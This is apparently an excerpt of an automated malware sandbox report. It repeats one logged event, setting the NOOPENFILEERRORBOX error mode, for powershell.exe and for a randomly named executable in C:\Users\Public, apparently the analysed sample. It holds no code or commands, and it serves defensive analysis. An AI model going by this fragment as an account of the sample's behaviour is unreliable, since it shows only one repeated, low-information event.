                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
